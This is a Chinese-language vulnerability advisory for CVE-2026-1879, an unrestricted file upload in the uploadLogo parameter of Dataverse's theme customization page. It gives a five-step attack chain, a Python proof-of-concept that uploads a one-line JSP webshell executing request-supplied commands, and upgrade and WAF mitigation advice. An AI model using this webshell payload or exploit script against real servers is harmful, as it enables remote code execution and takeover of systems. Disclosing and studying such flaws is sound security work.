CVE-2026-1879 CVSS 6.3 中危

CVE-2026-1879: Dataverse 任意文件上传漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1879

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Harvard University IQSS Dataverse

漏洞概述

Harvard University IQSS Dataverse 6.8及之前版本存在安全漏洞。攻击者可利用Theme Customization组件中/ThemeAndWidgets.xhtml文件的uploadLogo参数，绕过限制上传任意文件。此漏洞需低权限即可利用，可能导致远程代码执行，建议尽快升级至6.10版本修复。

技术细节

该漏洞源于Harvard University IQSS Dataverse在处理主题定制功能时的文件上传逻辑缺失。在`/ThemeAndWidgets.xhtml`接口中，`uploadLogo`参数未对用户上传的文件类型、内容及扩展名进行严格校验。由于CVSS向量显示PR:L，攻击者仅需拥有低权限账户即可构造恶意请求。通过上传包含WebShell（如JSP文件）的恶意文件，攻击者可将文件保存至Web可访问目录。服务器在解析或访问该文件时，可能执行恶意代码，从而获取服务器控制权，造成数据泄露或篡改。

攻击链分析

STEP 1

1. 获取权限

攻击者注册或获取一个低权限账户（PR:L）。

STEP 2

2. 定位接口

访问主题定制功能，定位到`/ThemeAndWidgets.xhtml`页面及其上传接口。

STEP 3

3. 构造载荷

准备恶意文件（如JSP WebShell），修改上传请求中的`uploadLogo`参数。

STEP 4

4. 执行上传

发送包含恶意文件的POST请求，服务器因缺乏校验而保存文件。

STEP 5

5. 触发漏洞

访问上传文件的URL，触发服务器端代码执行，获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-url/ThemeAndWidgets.xhtml"

# Attacker's session cookie (Low privilege required)
cookies = {
    "JSESSIONID": "attacker_session_id"
}

# Malicious file content (e.g., JSP webshell)
# Note: In a real scenario, this would be actual shellcode
files = {
    'uploadLogo': ('shell.jsp', '<%@ page import="java.io.*" %><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>', 'application/octet-stream')
}

# Send POST request to exploit the unrestricted upload
response = requests.post(url, files=files, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! File uploaded.")
    # Next step would be accessing the uploaded shell
else:
    print("[-] Exploit failed.")

影响范围

Harvard University IQSS Dataverse <= 6.8

防御指南

临时缓解措施

建议立即升级至 6.10 版本。如果无法立即升级，应通过WAF拦截对`/ThemeAndWidgets.xhtml`的非图片文件上传请求，或暂时禁用主题定制功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1879
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1879
3 Details https://www.cvedetails.com/cve/CVE-2026-1879/
4 VulDB https://vuldb.com/cve/CVE-2026-1879
5 Link https://gist.github.com/KaiqueFerreiraPeres/ba039887d7f894a7c38252314e0ef2cc
6 Link https://github.com/IQSS/dataverse/releases/tag/v6.10
7 Link https://vuldb.com/submit/749003
8 Link https://vuldb.com/vuln/354616
9 Link https://vuldb.com/vuln/354616/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表